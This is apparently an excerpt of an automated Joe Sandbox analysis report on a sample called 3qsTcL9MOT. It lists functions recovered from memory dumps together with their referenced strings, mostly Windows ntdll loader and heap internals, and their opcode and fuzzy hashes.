Instruction ID: f9ccb971ca57f0927b7981f9de6eb8645034fde2f7d7b9a75d102d971fd10062
Opcode Fuzzy Hash: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
Instruction Fuzzy Hash: FFA16D719012299BEB71DF68CD88BEEB7B8EF48710F1041E9E989A7250D7359E84CF50

Function 01030BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0107A10F
LdrpCheckModule, xrefs: 0107A117
minkernel\ntdll\ldrinit.c, xrefs: 0107A121

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
Instruction ID: e93891b20a2002b41546ffebf079d21a45a55ca14bcb75af67b52cf077c1e1fa
Opcode Fuzzy Hash: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
Instruction Fuzzy Hash: AC71F170E00209DFDB2ADF68C880ABEB7F4FB84704F18446DE99697255E774AD81CB50

Function 01020A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01075335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0107534D
HEAP: , xrefs: 01075342

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
Instruction ID: b98da8b52cae013446b65e9f2ca7e5d54f4c8bd9500045759ef6b8008c9151a7
Opcode Fuzzy Hash: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
Instruction Fuzzy Hash: 1461C270600355DFDB6ACF28C880BAABBE1FF45704F148599E4D98F296D770E881CB95

Function 0104C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 010882DE
minkernel\ntdll\ldrinit.c, xrefs: 010882E8
Failed to reallocate the system dirs string !, xrefs: 010882D7

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
Instruction ID: fdd596af89e477120d8d04e1ef88dd180ecebb8b05bd43c665001982b1fdf6b3
Opcode Fuzzy Hash: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
Instruction Fuzzy Hash: 914125B1945315ABE726EB68DD80B9B77E8BF48750F00453AF9D8D3291E7B0D840CB91

Function 010CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 010CC1F1
PreferredUILanguages, xrefs: 010CC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010CC1C5

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
Instruction ID: 398e9f32534073c47e7657cda15a1a2e89c69de817fb4a541bd3cea884e90b54
Opcode Fuzzy Hash: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
Instruction Fuzzy Hash: A4416171E00219EBEF51DBD8C951BEEBBF9AB14B00F14406AEA49B7290D7749E44CF50

Function 010A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 010A4160
LdrpResValidateFilePath Exit, xrefs: 010A4172
@, xrefs: 010A4225

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
Instruction ID: eafc0d39a20c03b6f4dbf1ba606b8d9527cd8596a651df1fa49bebd9c519a67f
Opcode Fuzzy Hash: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
Instruction Fuzzy Hash: C641E335A042598BEB21DBE9C840BADBBF8FF55340F5804A9D981EF792D7B49901CB10

Function 01094755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01094899
LdrpCheckRedirection, xrefs: 0109488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01094888

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
Instruction ID: 8f15c7434d7027517979fe3ecfbde74a40106982a4f7cb4de015211c85cdf10a
Opcode Fuzzy Hash: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
Instruction Fuzzy Hash: A841D332A146558FCF61CE59DA60A2FBBE4FF49A50F0505A9EDD8DB261D330D802EB81

Function 01020BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01075449
HEAP[%wZ]: , xrefs: 01075431
HEAP: , xrefs: 0107543E

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
Instruction ID: 965411afe837d07e17c5b2aa7d89630a98f5c9c2ce43cdd5c41c6b77fed8a998
Opcode Fuzzy Hash: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
Instruction Fuzzy Hash: BC1106317542529FEB6ACB18C844BFAB3A5EF40719F14816DF486CB295DF30D840C759

Function 010920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 010920FA
Process initialization failed with status 0x%08lx, xrefs: 010920F3
minkernel\ntdll\ldrinit.c, xrefs: 01092104

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
Instruction ID: 3f575b25f353761ef2f8d7b047873a1b9420715f802817db04703543ff52556d
Opcode Fuzzy Hash: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
Instruction Fuzzy Hash: F7F0C875A5030CBFEB24E64CDC56FE937A8EB50B54F100069F79067286D2F0A990D691

Function 010203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01074D8A

Strings

#%u, xrefs: 01074D82

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
Instruction ID: 25e5f0a1c11ae461e1ae90987d178925e899c8d3b24a9e5418be336da90a457a
Opcode Fuzzy Hash: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
Instruction Fuzzy Hash: 8C714971A0025A9FDB05DFA8C994BEEB7F8BF08304F144065E985EB255EA34ED41CB64

Function 0101A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0101AA25
LdrResSearchResource Enter, xrefs: 0101AA13

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
Instruction ID: a91336a41b885416d080c5cb7c6a1995ce5fcc912a3e0479814749392b58fcd6
Opcode Fuzzy Hash: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
Instruction Fuzzy Hash: CDE1A171F01299DFEF22CEA8C980BEEBBB9BF04310F144466E981EB245D7789940CB54

Function 010DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 010DA44B
`, xrefs: 010DA551

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 3aa179abf87529710931dad2682d2c088b54d859222fbd84ad363321ab74f6f7
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 04C18D31304346DBEB25CE28C841B6BBBE5AFC8318F184A6DF6D68B290D775D505CB51

Function 0108E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0108E75A
UEFI, xrefs: 0108E751

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
Instruction ID: 79fefde8364c8c8d03f469e8a3da1d46a34a1cde605e2141510607a5824da5aa
Opcode Fuzzy Hash: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
Instruction Fuzzy Hash: 15614B71E14619DFDB14EFA9C940BAEBBF5FB48700F144069EA89EB291D731A940CB50

Function 010B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 010B4437
MUI, xrefs: 010B4525

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
Instruction ID: e3e4578ed356e490ad2d0ea0511b9262801119e58e8ba3da37790e06c01f93fa
Opcode Fuzzy Hash: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
Instruction Fuzzy Hash: 11511871E0061DAEDB11DFA9CC80AEFBBB8AF48754F100529EA91E7291D7359A05CB60

Function 010104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01010540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0101063D

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
Instruction ID: 30650d1413d0efc876a89b9dd32b748ae1c0c58075f9d78429aa48745431afcf
Opcode Fuzzy Hash: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
Instruction Fuzzy Hash: 4151C1715047428BD725EF68C5406A7BBE4AF88304F108C3EF6D987249E778D985CB92

Function 0101A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0101A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0101A2FB

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
Instruction ID: 5e07659a9be35b3038924c7ab08732b8bf5e2a3b5073ebc0215cb5486c388f4b
Opcode Fuzzy Hash: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
Instruction Fuzzy Hash: 6441CF70B05695DBDB12CF69C840BAEBBF4FF84700F1480A5E984DB295E3B9DA40CB54

Function 010907C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

wZ4\(, xrefs: 010907DF, 0109081F
wZ4\, xrefs: 01090894, 0109085A

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: wZ4\$wZ4\(
API String ID: 0-2251784428
Opcode ID: 26749f4834ff26de87bbb3fc773f6a7af82293f857a86cc5528505b84d90ee70
Instruction ID: 7c03607419b9b787eee320d54d6a771cdf46dc92038f2310a163856fd0d9279d
Opcode Fuzzy Hash: 26749f4834ff26de87bbb3fc773f6a7af82293f857a86cc5528505b84d90ee70
Instruction Fuzzy Hash: 77419F71A083059BD760DF28C844B9BBBE8FF88754F004A2AF5D8D7291D7709844CB92

Function 0104A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0104A5E9
Cleanup Group, xrefs: 0104A5E4

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
Instruction ID: e23b596c0cab994c9b3a0747858a4912db12baad5fafbd291348770090601b7c
Opcode Fuzzy Hash: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
Instruction Fuzzy Hash: 310128B2680740EFE311DF14CD85F5677E8E788B19F008939B699C7190E774D804CB4A

Function 0101C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0101C8C3, 0101CA40

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
Instruction ID: 05c2640da8e6c416eeeba1188a79f75b8923de8304c8a2d312dac4330390ef6d
Opcode Fuzzy Hash: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
Instruction Fuzzy Hash: E0828D75E402188FEB65CFA8C9847EDBBB1BF48310F1481A9E999AB358D7389D41CF50

Function 01096420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 010965C1

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
Instruction ID: 222f189b77e684d18419f4b581182ca641e12150b32975e559b146aa7c55b00f
Opcode Fuzzy Hash: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
Instruction Fuzzy Hash: 0C916D72A00219ABEF21DF95CC95FEEBBB8EF58B50F104065F640AB190D775AD04DBA0

Function 010BE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 010BE1FA

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
Instruction ID: 45589de4cde3eae3ed48e999e8570afaab4c40a0730eb63356aa8c55f3c40402
Opcode Fuzzy Hash: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
Instruction Fuzzy Hash: 7991D271901609BFDB22AFA4DC84FEFBBB9EF45B40F100025F581A7251EB359941CB90

Function 0104A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 010867C9

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
Instruction ID: 27aabf02c525399b0ceacf386902c541c68ecbd004b3ce667810ec32d6d69464
Opcode Fuzzy Hash: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
Instruction Fuzzy Hash: 10718DB5E0420ACFDF68EF98C5906EDBBF1BF48700F15816AE586AB341E7328941CB50

Function 010B4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 010B4A7F

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
Instruction ID: 75443aef52c39e1865fef83926a1a80bdeec37c58f8420dfdf1ebce63e647305
Opcode Fuzzy Hash: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
Instruction Fuzzy Hash: 6251A872D0022A9BDF10DF99C880EEEBBB8AF15714F054169EA92FB241D3749D01CBE4

Function 0102E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0102E6A4

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
Instruction ID: cd9efec77e4df7a3ded7c7181dc49a52e0a97a4a5a28b998b390af3a53f95b7a
Opcode Fuzzy Hash: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
Instruction Fuzzy Hash: 9341AE72548322ABD720DA75C884BAFBBE8BF88B14F04096DFAC4D7180E674D904C797

Function 0108C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0108C77F

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
Instruction ID: 090d945ad477d6774dc75c7ea699ea38f7e918c9ad39f30f25e5b675b5085e4a
Opcode Fuzzy Hash: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
Instruction Fuzzy Hash: 234144B1D1412DEBEB21EB50CD84FDEB77CAB44714F0045A5AA88AB140DB709E898BA4

Function 010A6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 010A6B91

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
Instruction ID: d3e1ab36237dc4632e784d0de150ee335a6e3f6f1503b93ac3931e3d634c4aae
Opcode Fuzzy Hash: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
Instruction Fuzzy Hash: F7311C31A0071D9ADB22DFA9C854BFEBBF8DF44704F584068E9919B281D777E845CB50

Function 0108CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0108CAA2

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
Instruction ID: d39a14d35c059b59bbefc901626ac7c88b87e0398af0aa5b9947f9f6663fac2a
Opcode Fuzzy Hash: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
Instruction Fuzzy Hash: 4F31F136904919AFFB15EA58CA45EEFBBB4EF80720F014169E985A7250D7309E00DBE0

Function 0041ECED Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

\, xrefs: 0041ED3F

Memory Dump Source

Source File: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_3qsTcL9MOT.jbxd

Yara matches

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: cd92b2580c5dd2da17ceee1cde43f62f07d72c1235aab083e5c8981dcaf33c9d
Instruction ID: eeee24e5538f2f4e25c56492c70c2e508a79448b9a66f6f93e370c09374a36e2
Opcode Fuzzy Hash: cd92b2580c5dd2da17ceee1cde43f62f07d72c1235aab083e5c8981dcaf33c9d
Instruction Fuzzy Hash: 0B01BE7194032D7AEB20D7D6DC85FDF777C9B04748F40415EF60CA6181EBB4A6448B65

Function 0109892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0109895E

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
Instruction ID: ccec44db1c0cefa15ddb5ea97df39cdc427fe1431ce06b966d7839fd1e22b691
Opcode Fuzzy Hash: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
Instruction Fuzzy Hash: B60170327002099FEF7A5B15CCA4B5A3FA1EF87354B0C402DF7C106651CFA06880EB92

Function 010B2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
Instruction ID: d66f82fe80fc835b2c85b8087b3e5a41f99c3fbed875c2f49b1f8e8d49ebdca1
Opcode Fuzzy Hash: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
Instruction Fuzzy Hash: 2842D0326083419BE765CF68C8D0AAFBBE5BF98740F08496DFAC297250D735E845CB52

Function 010A8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
Instruction ID: 77be9f6b7af6fbbdfd33de6879849edc76cfe0ba538a0f012708f5cb58b3a4c4
Opcode Fuzzy Hash: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
Instruction Fuzzy Hash: 9F424D75E002198FEB64CFA9C841BEDBBF5BF48301F54C19AE989AB241DB349985CF50

Function 01022840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b551359dad359f9fe480b5e1ba48a5ed8ccfbf29958d1a98ed499cd29489b3af
Instruction ID: 991c32527ed3a8bd4cc8f986b1860ab46cff10a44b43bcc06a8e19a77b8ec08d
